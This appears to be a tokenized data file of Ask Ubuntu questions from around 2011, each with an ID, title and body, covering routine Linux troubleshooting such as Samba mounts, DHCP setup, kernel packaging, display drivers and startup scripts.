57089	why did thunderbird replace evolution in 11.10 ?	according to this , the default email client for ubuntu 11.10 will be thunderbird instead of evolution . i 've used evolution since ubuntu 9.10 ; i 've always used the default applications because i thought they were recommended . why is thunderbird the new default email client instead of evolution ?
57098	disable auto-start application	i couple of versions of ubuntu ago i setup a program to start automatically when the computer turns on . it is of no use to me at this point , and i want to disable it now . the problem is , i ca n't figure out how i did it . i 've looked in : startup applications ( gnome-session-properties ) ~/.config/autostart ~/.config/gnome-session/saved-session/ /etc/init.d/ /etc/gdm/ is there somewhere else i might have set it ? or is there a way to trace how a running program was started ? could n't find anything like that in system monitor .
57099	drive information like windows 7 ?	in windows 7 the computer area has drives sorted by type which list the size remaining and a progress bar to represent the size currently in use . is there a way to customize ubuntu 11.04 to do the same ? ( no previous modifications made ) i want to style the computer section to look like windows 7 , not use what 's already there .
57101	can not install any software from the software center due to ttf-mscorefonts-installer package error	when i try to install any software from ubuntu software center it comes with error : an unhandled error occured there seems to be a programming error in aptdaemon . this is the software that allows you to install/remove software and to perform other package management related tasks . details traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 961 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1085 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 226 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate file for the ttf-mscorefonts-installer package . this might mean you need to manually fix this package . please help me !
57102	command for taking all files in sub directories and putting them in parent directory	i have a directory that contains around 100 subdirectories . i want to take all the files from this directories and add them to the first directories then delete them all . is this possible ?
57103	fn+f7 key not working on sony vaio vpcsb18gg ( s series )	i have a sony vaio vpcsb18gg ( s series ) running ubuntu 10.04 . please help get the vga out to an external monitor using fn+f7 or by any other method .
57105	where is my awstats 6.9.5~dfsg-5 installed ?	i installed this webserver log analyzer with synaptic , and now can not find it . it will not run from terminal . i have abyssx1 running on my box and would like to see my visitor statistics .
57107	unable to mount xp share : error nt_status_unsuccessful	i 'm failing with mounting xp share , receiving message : ... mount error ( 110 ) : connection timed out refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) when i try to list shares with smbclient , finally i receive message : ... running timed event `` tevent_req_timedout '' 0x7f2902964ad0 error connecting to 192.168.34.140 ( success ) lang_tdb_init : /usr/share/samba/en_us : en.msg : no such file or directory connection to 192.168.34.140 failed ( error nt_status_unsuccessful ) i was n't able to find solution , could anyone advise ? context : i 'm trying to mount share of nt-domain machine with xp which is accessed via vpn . while my ubuntu machine is still in default workgroup . is this possible at all ? connection to target machine could be established , f.e . i can connect to it via rdp . command executed to mount : mount -t cifs //192.168.34.140/share_name /media/share_name -o username=xpdomainusername , password=xpdomainpassword , workgroup=xpdomainname command executed to list shares : smbclient -l //192.168.34.140 -u xpdomainname\\xpdomainusername -- debuglevel=10
57111	nvidia geforce 8600gt not working after installing additional driver	after installing additional driver of my nvidia geforce 8600gt in ubuntu 11.04 , it is not working . the ubuntu loading dots show full but its not starting .
57119	building a new vanilla kernel - some confusion with the produced debs	so i wanted to try to build 2.6.39-4 . i followed the procedure at ubuntu wiki `` gitkernelbuild '' page . in short , download the tar.bz2 , extract , copy my old config , make oldconfig , and then fakeroot make-kpkg -- initrd -- append-to-version=-custom kernel_image kernel_headers all went fine , i am using this kernel right now , except one little thing : i can not build other modules , build dkms etc . further info follows : the produced deb files are two : linux-image-2.6.39.4-custom_2.6.39.4-custom-10.00.custom_amd64.deb linux-headers-2.6.39.4-custom_2.6.39.4-custom-10.00.custom_amd64.deb i am a bit confused by this . in normal ubuntu kernels , even those in mainline-ppa , there are three deb files that are installed . for example , for the same kernel from the mainline ppa there exist these packages : linux-image-2.6.39-02063904-generic_2.6.39-02063904.201108040905_amd64.deb linux-headers-2.6.39-02063904-generic_2.6.39-02063904.201108040905_amd64.deb linux-headers-2.6.39-02063904_2.6.39-02063904.201108040905_all.deb as you can see , there are two different header packages . indeed , after installing them , the mainline ppa packages create a directory under /lib/modules : /lib/modules/2.6.39-02063904-generic in that directory , a symlink exists which points to the -generic headers under /usr/src /lib/modules/2.6.39-02063904-generic/build - > /usr/src/linux-headers-2.6.39-02063904-generic under /usr/src , two different directories exist for this kernel /usr/src/linux-headers-2.6.39-02063904-generic /usr/src/linux-headers-2.6.39-02063904 now , here is the problem with my own two packages : in /usr/src there is just one folder , /usr/src/linux-headers-2.6.39.4-custom and under /lib/modules , there is a folder /lib/modules/linux-headers-2.6.39.4-custom the real issue , and the reason i am writing this post is this symlink that gets created in the above directory : /lib/modules/linux-headers-2.6.39.4-custom/build - > /home/nickped/projects/kernel/linux-2.6.39.4 as you can see , it links back to the directory where i built the kernel - which of course might not exist afterwards . this causes other modules ( for example vmware , virtualbox etc ) to fail to built , as it ca n't find important things . why does this happen ? how can it be fixed ? why there are two and not three deb files produced ? what is the purpose of those 3 different deb files that official releases have , and how can they be created by others ?
57126	cpan vs . apt : conflicts in versions ?	i ca n't find the answer to this anywhere : does a module installed via apt conflict with one installed via cpan ? along with that question are these : where does the installed cpan modules live ? are they accessible globally or just to the installing user ? how do you know which one ? how do you know what 's installed and which takes precedence ? should cpan even be used when modules are installed via apt ?
57129	how do i start the gui ( window manager ? ) over vnc ?	i have a netbook and a server , to both of which i installed the identical ubuntu 10.04 lts distribution . on the server , i had the foresight to install and enable the ssh server before disconnecting the monitor and keyboard and mouse . i then ssh'ed in and enabled the vnc server as well . now i want the full server experience on the netbook , but when i vnc in , i am greeted with the displayed screen . ( names have been redacted ) how do i start the rest of the default ubuntu gui experience ? ( the toolbars at the top ) ( ( is that the window manager ? ) )
57132	w showing wrong number of users logged in	can anyone explain me why w shows me a wrong number of users currently logged in ? root @ host ~ # w 20:14:54 up 17:13 , 3 users , load average : 0.00 , 0.01 , 0.05 user tty from login @ idle jcpu pcpu what root pts/0 xx.xx.42.51 19:29 0.00s 0.50s 0.00s w flint pts/2 xx.xx.42.51 19:53 3:32 0.43s 0.00s tmux a root @ host ~ # who root pts/0 aug 14 19:29 ( xx.xx.42.51 ) flint pts/2 aug 14 19:53 ( xx.xx.42.51 ) root @ host ~ # users flint root
57133	what is the normal metacity and nautilus memory consumption ?	uptime 07:07:32 up 13 days , 4:01 , 2 users , load average : 0.47 , 0.28 , 0.21 system monitor shows that metacity uses 1.2 gib and nautilus 450.1 mib . everything has gotten pretty slow-ish so i suspect that this is not normal ?
57140	disconnects on a latitude e6410 with centrino 6200 wireless	sometimes the wireless connection is disconnected and turned off the computer must do to correct it . a full update was done to try and fix this , and i searched many forums for this problem but i found nothing . here is my wireless information : [ 0280 ] : intel corporation centrino advanced-n 6200 [ 8086:422c ] ( rev 35 )
57143	korean→english dictionary app	is there a korean→english dictionary installed on ubuntu ? if there are several ones , which one could be considered the most complete ? something like gjiten for japanese→english would be good .
57144	how to gmail archive option in evolution ?	how can i easily archive my gmail account emails in evolution ? i would like a solution easy as gmail archive . after lot of googling the only solution that i found is manually sending to the all email folder : / .
57149	android u1 files app does not have an 'up ' action	when i navigate into a folder in u1 , i see the contents of that folder ( files and nested folders ) . however , to go back to the parent folder , the only option is to hit the back button . it would be nice if there was true folder navigation in the android application .
57150	can i hide the menubar/tray on the secondary monitor in natty ?	in maverick the topmost tray used to be shown only on the primary monitor , and i liked that better .
57153	how can i get the programmes i use everyday to auto start at boot in the specified workspaces ?	is there a way i can have all the programmes i use everyday auto start in the correct workspaces ?
57154	can not ping by host name for some computers	i have 11.04 installed . it is joined to a domain . i am able to ping some of my computers by their name , but some i ca n't . those i ca n't are our nas machines ( readynas netgear ) . i can ping them only by ip from my ubuntu machine . but i can ping them regularly by host name , from any other windows machine . please advise what should i check ?
57155	dhcpd fails to start on eth1	i 'm having trouble configuring and starting isc dhcp server on my machine . i 'm running ubuntu 11.10 desktop edition . i installed isc dhcp by running $ sudo apt-get install dhcp3-server my machine has two nics : eth0 , which is connected to a router for internet access , that has an ip address of 192.168.2.2 ; and eth1 , where i want dhcpd to serve requests , for a subnet . i have modified /etc/default/isc-dhcp-server to point to eth1 : $ cat /etc/default/isc-dhcp-server # defaults for dhcp initscript interfaces= '' eth1 '' i have configured dhcpd for a simple subnet : $ cat /etc/dhcp/dhcpd.conf ddns-update-style none ; default-lease-time 600 ; max-lease-time 7200 ; subnet 192.168.0.0 netmask 255.255.255.0 { interface eth1 ; range 192.168.0.50 192.168.0.100 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.0.255 ; } with this configuration , dhcpd fails to start for me : $ sudo /etc/init.d/isc-dhcp-server start * starting isc dhcp server dhcpd * check syslog for diagnostics . [ fail ] $ tail /var/log/syslog aug 15 15:29:45 eptc4 dhcpd : no subnet declaration for eth1 ( no ipv4 addresses ) . aug 15 15:29:45 eptc4 dhcpd : ** ignoring requests on eth1 . if this is not what aug 15 15:29:45 eptc4 dhcpd : you want , please write a subnet declaration aug 15 15:29:45 eptc4 dhcpd : in your dhcpd.conf file for the network segment aug 15 15:29:45 eptc4 dhcpd : to which interface eth1 is attached . ** aug 15 15:29:45 eptc4 dhcpd : aug 15 15:29:45 eptc4 dhcpd : aug 15 15:29:45 eptc4 dhcpd : not configured to listen on any interfaces ! am i missing a step ? i do n't understand why dhcpd is complaining that it 's not configured to listen on any interfaces . this is my first time setting up dhcp . i 've spent three days reading manuals and forums and think i 've done everything right , but keep getting the same error . any tips to get me on the right track are greatly appreciated !
57156	how to upgrade libreoffice to 3.4.2	how to upgrade libreoffice from 3.3.2 to 3.4.2 final ( 2011-08-01 ) on 10.10 i added the ppa sudo add-apt-repository ppa : libreoffice/ppa and tried to use update manager in system - > administration to upgrade it and could not find any package to upgrade .
57159	the configuration defaults for gnome power manager have not been installed correctly . can not login	i have booted my ubuntu 11.04 on my other pc ( i have put my disk into it and booted it ) and now do n't know why , when i put it back to my lappy i get this error i can not login to the gui . i know i can repair it from the virtual terminal but how ? can you help me on that ?
57162	did synapse forget everything and so why ?	i 've been using synapse for a while now . the earlier bug regrading the lacking ability to remember recurrent launches was fixed . i 've been launching the same documents i am working on at the moment for the past months and there was no issue . but today , for some mysterious reason , synapse does n't remember any of these , nor can it find them in its search . i had to browse and launch them myself ! ( how medieval is that ! : ) ) so , did something happen ? can i find out what and why ? and most importantly : can it be fixed ? nb : problem also posted on launchpad .
57163	how to open an url from command line to firefox and `` switch to tab '' ?	firefox 5.0 has the option to `` switch to tab '' if the requested url or search terms point to an already open url ( great thing by the way ) . now , to open a url from command line to firefox a mere firefox http : //myurl.com would do , but even if that url already is open , firefox will open it once more in another tab . how can i -- -from command line -- -tell firefox to open the desired url in an already existing tab if possible ?
57164	corrupted partition when it was updated to 11.04 including grub ?	this problem seems centered around me , it has happened twice ! description of the problem my linux partition ( ext4 ) got corrupted . i believe a bad superblock ... so when i boot my computer i get no grub just a flashing monitor . i fixed it using windows 7 dvd . last time this happened i accidentally formatted my ubuntu partition and so i reinstalled ubuntu ( 10.04 32 - bit ) . when this problem pops out when grub updates i believe .. because the last time i got this error was when i updated grub . this time also i was updating ubuntu from 10.04 to 11.04 and grub got updated and the partition got corrupted ! any idea how to get my ubuntu partition back and what is causing this problem ? clarifications my entire ubuntu partition is corrupted ! ! !
57168	how to restore openoffice file ?	i have worked in a file for 4 months . all of a sudden when i open that file this morning its not getting opened . and i have noticed the size got decreased to 128kb to 1kb . not only my system , recently we are facing this problem in many systems . data is getting corrupted and we cant able to open the file . what may be the issue ? and is it possible to recover the data ? i hardly need those datas , can anyone help me pls . thanks in advance.. details : ubuntu 10.10 open office 3.2.1
57169	how does one customize kubuntu search and launch ( with the plasma-netbook interface ) ?	how do i change the default icons ( boxed , see arrow ) or how do i remove them ? i have tried unlocking and customizing the page , but have n't had much success . os : ubuntu 11.04 with kubuntu-desktop installed ( using plasma-netbook ) .
57172	tata photon whiz not detected	my tata photon whiz huawei modem could not detected in ubuntu 11.04 . i have tried my best but it went in vein . so please help me , i am not able use internet on ubuntu .
57173	windows sometimes does not open fully	i am using natty unity . i am facing 1 intermittent problem . sometimes , my application windows does not open completely . for example , please refer following image . you may observe that my google chrome has opened two tabs whereas my firefox ( facebook tab ) is running behind in the background . in such case , i am not able to operate on chrome . i have to minimize all open windows and then reopen google chrome . please refer following image . any pointers to solve the problem .
57174	how should i partition my hdd ?	i am using ubuntu on my notebook with 4gb ram and 300gb hdd and my layout is : / - 15gb ext4 ( 4.5gb used ) /home - 280gb ext4 ( 200gb used ) /swap - 2gb i have recently built a pc with 8gb ram and a 1tb hdd . now i am curious as to how i should partition my hdd , so that i dual-boot ( win7 + ubuntu ) . i was thinking : boot - 200mb / - 10gb xfs /home - 1000gb xfs ntfs - 200gb no swap because i do n't use hibernate at all . ubuntu will be primary system , win7 is only for a few fresh games which can not run with wine . the only questions : is /boot needed ? is xfs better for /root and /home ? and is n't it bad that /home is so big ? if yes , should i made /usr , /var , /tmp or something else ?
57176	wine games resolution not working properly	from : wine games resolution/sound problems for some reason , in all the games i 've tried ( battle realms , worms armageddon , and starcraft i ) , the resolution for the game is really small . i have virtual desktop enabled in the wine.cfg ( resolution 1280x1024 ) , but the game is displayed a lot smaller than the screen and is in the top left corner of the screen . in fact , it 's pretty much exactly the same problem that someone had on appdb ( except that my monitor is square , not wide screen ) : do n't fullscreen , opens top-left hand corner i 've done some reading on this , and i 'm guessing ( although not sure ) that it has something to do with my xorg file not being able to handle anything other than 1280x1024 ( if that is the case , though , i do n't know what to do to add more resolutions ) . note : another thing that makes me think it has to do with my xorg is that when i play worms armageddon , the menu screen is small ( like all the other games ) , but when i play a level , it goes to full-screen mode . which , i 'm guessing is because it supports 1280x1024 whereas battle realms/starcraft ( being older games and without recent updates ) do n't support that high of a resolution . note : another thing i noticed about playing starcraft i , whenever i play it with virtual desktop less than 1280x1024 ( i.e . windowed ) , instead of wine changing the starcraft resolution to fit the window , starcraft makes the window fit its resolution ( which is really small ) . does anyone know how to fix this ? thanks !
57186	kernel 2.6.38-10 and 2.6.38-11 unable to boot in ahci mode	i switched in my bios ( on an old gigabyte ga-ma74gm-s2h , rev . 1.1 , bios f1 ) the sata settings from `` native ide '' to `` ahci '' and was surprised that grub2 was not able to boot my kernel anymore . it stated : can not read the linux header i was running the latest natty kernel 2.6.38-11 / 32bit pae . guessing a problem with grub2 and ahci i was much more confused as i was able to load older kernel version including 2.6.38-9 , but not -10 anymore . so i dumped -10 and -11 and re-installed kernel 2.6.38-11 ( generic and pae ) with the same result but a different error message ( could not load file ) . changing the sata settings back to `` native ide '' mode , everything works ok . anyone observed this too and has any suggestions ? the reason i want to run in ahci is because i want to install a ssd drive in near future , running it in ahci for better performance and as suggested by the vendor ( ocz ) . edit : here 's a part of my grub.cfg . config for kernel 2.6.38-11 , not running : menuentry 'ubuntu , mit linux 2.6.38-11-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 14611dce-f4ab-498d-b1a1-609ed9f17da2 linux /boot/vmlinuz-2.6.38-11-generic-pae root=uuid=14611dce-f4ab-498d-b1a1-609ed9f17da2 ro quiet splash vt.handoff=7 initrd /boot/initrd.img-2.6.38-11-generic-pae } running 2.6.38-9 configuration : menuentry 'ubuntu , mit linux 2.6.38-9-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 14611dce-f4ab-498d-b1a1-609ed9f17da2 linux /boot/vmlinuz-2.6.38-9-generic-pae root=uuid=14611dce-f4ab-498d-b1a1-609ed9f17da2 ro quiet splash vt.handoff=7 initrd /boot/initrd.img-2.6.38-9-generic-pae } maybe i 'm blind but i do n't see any difference in the important parts . here the blkid output : halil @ klingonwarrior : ~ $ sudo blkid -c /dev/null /dev/sda1 : uuid= '' 14611dce-f4ab-498d-b1a1-609ed9f17da2 '' type= '' ext4 '' /dev/sda5 : uuid= '' 14ebd487-ff28-4678-831b-d94dd9df4f60 '' type= '' swap '' /dev/sdb1 : label= '' hometrek '' uuid= '' b044b71044b6d7f4 '' type= '' ntfs '' and , as written , both configurations run in `` native ide '' mode . btw , the re-intstall of the -11 kernel was done in ahci mode . edit2 : ok , here the fdisk output : halil @ klingonwarrior : ~ $ sudo fdisk -lu platte /dev/sda : 163.9 gbyte , 163928604672 byte 255 köpfe , 63 sektoren/spur , 19929 zylinder , zusammen 320173056 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x477d477c gerät boot . anfang ende blöcke id system /dev/sda1 * 63 308094569 154047253+ 83 linux /dev/sda2 308094570 320159384 6032407+ 5 erweiterte /dev/sda5 308094633 320159384 6032376 82 linux swap / solaris platte /dev/sdb : 500.1 gbyte , 500107862016 byte 255 köpfe , 63 sektoren/spur , 60801 zylinder , zusammen 976773168 sektoren einheiten = sektoren von 1 × 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x74720d9c gerät boot . anfang ende blöcke id system /dev/sdb1 * 63 976768064 488384001 7 hpfs/ntfs sorry 4 the german output ... . more info needed ?
57188	how can i configure gedit to execute different languages with f5 ?	i have installed the better python console-plugin for gedit and i am happy with it when i view python code . but i would like to be able to execute some different languages source codes when i have opened it in gedit . for example , i would like to run $ g++ filename.cpp -o filename.out ; ./filename.out if i hit f5 while i have opened a c++-file . if i have opened a php-file i do n't want to happen anything at all . is this possible ?
57191	over web access how do i move files between folders	when connected to ubuntu one via an internet browser , how do i move files between my different folders in ubuntu one ?
57192	is it normal for google chome development channel to not have the 'paste and go ' option in the address bar ?	how i 've installed on ubuntu 11.10 i 've added the google to my software sources , then used the following commands ( not 100 % accurate ) sudo apt-get update sudo apt-get install google-chrome-unstable i also get the same thing on chromium which is installed via the ubuntu software centre and also on fedora 15 which i installed via the download on the google chrome website . on windows 7 i have the 'paste and go ' , i was wondering if i could get the same on the linix oss that i used ? thanks
57193	no hardware acceleration/graphics driver for dell inspiron 1525	compiz bails when i try to run it : xlib : extension `` glx '' missing on display `` :0.0 '' . compiz ( opengl ) - fatal : root visual is not a gl visual compiz ( bailer ) - info : ensuring a shell for your session i have no idea why . it was working without a hitch , and one day , i realized compiz was n't running . i tried to run it and the above message is what i got in reply . i looked under the menu , and saw some nvidia program , so i ran it and it told me i was n't using the nvidia driver and to run sudo nvidia-xconfig . i ran it and it created /etc/x11/xorg.conf that was n't there before . upon restarting x , it complained that `` nvidia '' did not exist . [ the driver ] so , i 've asked on ubuntuforums , and got no replies . i figured i 'd try here before i reinstall ubuntu again . [ just upgraded from 10.10 to 11.04 a little while ago -- it was working fine on both versions , it just started to quit working on 11.04 recently ] edit : matt : ~ $ lspci |grep vga 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) in additional drivers , there is only 1 : my wifi driver , and it is activated .
57196	how can i use $ and euro buttons	i have an acer aspire 5930 there are two buttons , which i ca n't use now : $ and âź when i press those buttons nothing happens . how can i use it ? on windows i can use the program launch manager for it ( from acer.com ) i tried system- > preferences- > keyboard- > layots- > keyboard model - > acer- > acer laptop but that did n't help me
57198	using burg to dualboot ubuntu 11.04 and fedora 15 from usb ?	how can i make grub2 to see my ubuntu from hd and fedora 15 from usb flash , using burg and natty , can not find a solution in any forum . would appreciate any hints , harry
57199	using fusecompress on a data drive	i 've looked at the man page and documentation on fusecompress and i got a little confused . it looks like it mounts the compressed filesystem as i want , but not on the drive i want it . it seems to me that it just creates a temp mounting folder for compression . what i would like it to do is take over one whole drive ( or 2 ) that i use for data backup . for instance : my os is on sdc backup1 is on sdd backup2 is on sde i would like fusecompress to mount backup1 & backup2 as compressed filesystems . can someone help me out with this ? i feel like i 'm just messing up the syntax . p.s . it is totally acceptable for it to just be a folder inside of the sdd & sde drives that is compressed and mounted . end result is just 2 mounted locations that are fully compressed on both drives .
57201	how do i get the gui to come back ?	my computer for some reason is no longer booting into the gui . it sends me straight to the command line . how do i get it to launch the gui and how do i get it to launch the gui by default on startup ? i 'm using lucid lynx .
57206	how do you completely shut down ubuntu one ?	i 'm using hughesnet for internet and i have a daily 200 mb limit on downloads . how can i exit ubuntu one and be sure that i 'm no longer syncing or downloading anything . i have unlimited downloads between 1 am and 6 am cst , i only want to sync or download during these hours . i have ubuntu 11.04 on virtualbox on a windows 7 host , and have ubuntu one on both systems . i 've used windows task manager to end 2 obvious ubuntu one processes , is this sufficient ? are there any more processes to shut off or can i just exit on the system tray context menu ?
57207	rebind control-n control-p	i would like to rebind c-n and c-p in all my applications to send up and down . my brain is just stuck with this shortcuts , and i am tired of always seeing new windows and printing dialogs popping up . i was thinking about xmodmap , but it looks like it can redefine only one keysim not a combination . also tried xdotool key up and xte 'key up ' to bind from keyboard shortcuts . it does n't work properly and requires sleep 0.2 before the invocation which makes it infeasible . any ideas ?
57211	how well does a bcm4321 bluetooth work ?	i want to upgrade my dv6000 's wireless card with a bcm4321 , i already have problems getting my bcm4311 to work . what i want to know is : will the 4321 work and will the bluetooth work as well ?
57212	how i can extract files , name.iso.001 name.iso.002 and so on	i just downloaded some materials , but the extensions are not recognized by ubuntu . i have a bunch of files names name.iso.001 , name.iso.002 and so on . how i can extract or mount it ?
57216	opengl windows always on top	in order to get webgl working on ubuntu i had to change some setting which somehow forced hardware acceleration to be turned on for a window . unfortunately now all opengl viewports are always on top like an overlay and causes other annoying `` overlay '' glitches . in any case i 'm afraid i really ca n't remember what i did to break things and i do n't know where i found that reference ! does anyone happen to have any ideas how i broke it or could fix it again ? i 'm running the fglrx driver with ati hd 5000 series card , ubuntu 11.04 . i 'm also running ubuntu with the plain no effects classic gui . some glxinfo : name of display : :0.0 display : :0 screen : 0 direct rendering : yes server glx vendor string : ati server glx version string : 1.4
57220	start vboxheadless vm at startup	i can not seem to get my vm to run at startup . i tried the `` startup applications '' and update-rc.d with no luck . sudo update-rc.d startvms defaults 99 10 this created all the appropriate symbolic links for the different run levels but the vm still does not start . here 's my startvms script : # ! /bin/bash # # # begin init info # provides : startvms # required-start : $ remote_fs $ syslog # required-stop : $ remote_fs $ syslog # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : start my vms at boot time # description : enable service provided by daemon . # # # end init info case `` $ 1 '' in start ) echo `` starting '' nohup vboxheadless -- startvm `` ubuntuserver '' & ; ; stop ) echo `` stopping $ desc '' vboxmanage controlvm `` ubuntuserver '' poweroff ; ; restart|force-reload ) echo `` restarting $ desc '' vboxmanage controlvm `` ubuntuserver '' poweroff nohup vboxheadless -- startvm `` ubuntuserver '' & ; ; * ) n=/etc/init.d/ $ name echo `` usage : $ n { start|stop|restart|force-reload } '' > & 2 exit 1 ; ; esac what am i doing wrong ?
57223	run auto-disper automatically on device wake/thaw	i 'm using a thinkpad w510 and constantly change locations . i 'm using disper and auto-disper to change screen profiles ( undocked ; laptop screen + external screen ; two external screens ) . i wanted to run auto-disper -- change after waking up , so i put the following script in /etc/pm/sleep.d : # ! /bin/bash case `` $ 1 '' in thaw | resume ) auto-disper -- change & > /home/myhome/autodisper_on_wake.txt ; ; esac upon wake , i get the following in autodisper_on_wake.txt , indicating that the script did fire : assuming disper defaults ... 'nonetype ' object has no attribute 'endswith' unable to fingerprint display configuration home school undocked but no change happened - despite unplugging my monitor before waking my machine ( going from profile 'school ' to profile 'undocked ' ) , i 'm still in profile 'school ' . any ideas how to proceed ? ( fwiw , i changed autorandr to have profile and config point to my absolute home directory , rather than ~ [ i thought maybe wake scripts execute as root , so it would look in ~root for profile data ] ) .
57224	a sudden drop in free disk space	i 'm using ubuntu 11.04 . today i suddenly started to get `` low disk space '' warnings . when i checked , i saw that free space on my ubuntu partition is decreased like 2 or 3 gigabytes . i did n't install anything recently and i do n't keep my files in my ubuntu partition . what could be the reason for this ?
57226	what is edge.launchpad.net and how does it work ?	quite often i find myself on edge.launchpad.net instead of the 'usual ' launchpad . it looks exactly the same as traditional launchpad , so i wonder if there is any difference . this happens usually when i go to launchpad by clicking a link on a third party website . somehow people prefer to link to the edge subdomain of launchpad , or at least i have such impression . so what exactly is the edge.launchpad.net ? and why some people prefer it than the usual launchpad.net ? looking for information i was always redirected to https : //help.launchpad.net/launchpadreleases and https : //help.launchpad.net/betatesting , but i did n't find there anything about edge . i guess it may be something like a testing environment , if yes , than how does it differ from staging.launchpad.net and qastaging.launchpad.net ?
57228	caps lock key swaps back to default after minute or so after i set it with setxkbmap	im trying to swap caps with control in last ubuntu xfce4 windows manager . i googled alot of variants , and fastest was /usr/bin/setxkbmap -option `` ctrl : nocaps '' but it auto swapped back after a minute or so . and ii do n't know which program swapped it back . any advice ?
57236	unable to change brightness in a lenovo laptop	brightness adjustment keys < fn + ⇑/⇓ > have no effect ( although they are recognized by the environment ) , and i ca n't change the brightness using gui tools as well . this seems like a problem in linux itself , not the desktop environment . i can change the brightness in windows os , so it 's not some kind of hardware fault . details : lenovo b570 ( model name : 20093 ) integrated intel hd graphics card kubuntu 11.04 ( linux 2.6.38-10-generic , kde 4.7.0 ) , everything up to date no proprietary graphics drivers ( only wi-fi one ) what i 've tried : edit /etc/default/grub↦grub_cmdline_linux_default : acpi_osi=linux , acpi_backlight=vendor , nomodeset . and yes , i did update-grub edit /etc/x11/xorg.conf ( no such file , even after sudo dpkg-reconfigure xserver-xorg ) edit /proc/acpi/video/vga/lcd/brightness ( no such file ) sudo setpci -s 00:02.0 f4.b=xx ( no effect ) xbacklight -set xx ( `` no outputs have backlight property '' ) how can i fix this issue ?
57237	getting dynamic firewall from fedora 15 into ubuntu ?	just tried out fedora 15 and noticed the pre-installed firewall application that i found much easier to use than any other previously tried out firewall manager . definitely miss it at my ubuntu workstation , so how can i get it ?
57238	wrong audio volume at boot	when i boot my computer and login the volume level is always way too loud . unfortunately the only way to change it is a physical knob on my speaker . as soon as i can change the volume using my keyboard the volume immediately drops . say the volume is at 100 % , as soon as i turn the dial on my keyboard a little bit it drops to a normal level like 40 % how do i get this to work in a clear way , like having it remember the audio level it was on at shutdown ? here 's my audio card model : 82801ji ( ich10 family ) hd audio controller an intel card on a asus motherboard
57240	secondary hard drive sometimes mounted to wrong location ?	so i edited the /etc/fstab file , and added this line /dev/sdb1 /media/additionaldrive1 ext4 defaults 0 2 and most times , my hard drive is there waiting for me in the right location . but sometimes , and i 'm not sure if i'ts at boot up , or sometimes afterwards , since i generally do n't need to the use the drive immediately after boot up , i find the drive not at /media/addtionaldrive1 , but at some seemingly random address of `` 62ae4915-ee29-414e-a684-fc700064d952 '' this is annoying as it breaks file references to that drive ( it has my virtual machine images ) . any idea what the problem is ? reboot generally solves , it 's not a very nice solution though . edit : here is the fstab file : proc /proc proc nodev , noexec , nosuid 0 0 /dev/sda1 / ext4 errors=remount-ro 0 1 /dev/sda5 none swap sw 0 0 /dev/sdb1 /media/additionaldrive1 ext4 defaults 0 2
57242	no graphical interface after hard shutdown	i just installed ubuntu on my laptop and i must have spelled my username and or password wrong because i can not login now . i tried shuting down my computer manually by holding down the power button and now all i see is a blinking dash . what can i do ?
57245	why do n't menus in nautilus or the desktop have shadows behind them ?	menus in the file manager and desktop , both controlled by nautilus , do n't have shadows behind them when other gtk menus do ? i 'm running the proprietary nvidia drivers with compiz , by the way .
57247	i can not upload my files into ubuntu one	when i upload a file in ubuntu one it just show me this : and wait on this for hours whats the problem ?
57248	how can i get places > connect to server ... to default to ssh rather then ftp	i often use places > connect to server ... and always connect with ssh . the connect to server dialog box always selects service type as public ftp by default . is there a way to change this so service type always defaults to ssh ?
57249	synchronising data between differently sized , and intermittently connected , devices	i am trying to find a solution to sharing my /home directories between my home computers . i have one desktop , with a 1tb disk , and a laptop with a 500gb disk . i also have a home server , which has a 1tb disk . the server 's disk is completely usable for the solution . i 'd like a solution that would be able to run on my home network - so ubuntu one is out of the question , and it 's prohibitively expensive for the amount of data - and would allow my laptop , with a smaller total hard drive space than my desktop , to access all my files - i believe this removes an rsync based solution . i would also like to be able to access files that have been `` synchronised '' , for lack of a better word , to my laptop when i am not connected to my home network . this would also be useful for my desktop , in the case of the server being powered down . i am quite competent with linux , as well as networking , so i am not afraid of any technical issues . thanks in advance , joe .
57254	will samsung laptops be fully ( ootb ) supported by ubuntu ?	power management like : suspend , hibernate , open/close lid , optimal ( `` healthy '' ) disc activity , internal modem , backlight control , fn keys etc . will it be fully supported by ubuntu out of the box ? so the average user could just use the laptop not worrying about it ? i know there 's voria 's ppa but that should be ootb support . thanks .
57259	is the ubuntu policy manual out of date ?	i just started reading the ubuntu architecture wiki which outlines the overall architecture of ubuntu . got to the section that discusses the ubuntu policy manual and that it is derived from the debian policy manual . i noticed that at the bottom of the ubuntu policy manual that the document has not been changed since 2009-06-19 . i also noticed the debian policy manual was last updated on 2011-04-07 . could be that no changes were necessary , but given the tight symbiosis between ubuntu and debian i would expect a more recent change date for the ubuntu policy manual . it could be that there just was no reason to update the document in over two years , but i am looking to better understand why ?
57264	how can i define startup applications with the awesome window manager ?	i 've been reading as much as i can online , but none of it seems to work ( i.e . changing ~/.config/awesome/rc.lua ) . i 've installed awesome window manager from the repos , and i log into it via gdm , and now i 'd like to get it to start a few applications every time i log into the session .
57271	how to set up uri / magnet links . ( xdg-open )	i want to open magnet links for torrents and spotify , but whenever i click on one it either opens up another window in chrome , or does nothing in firefox .
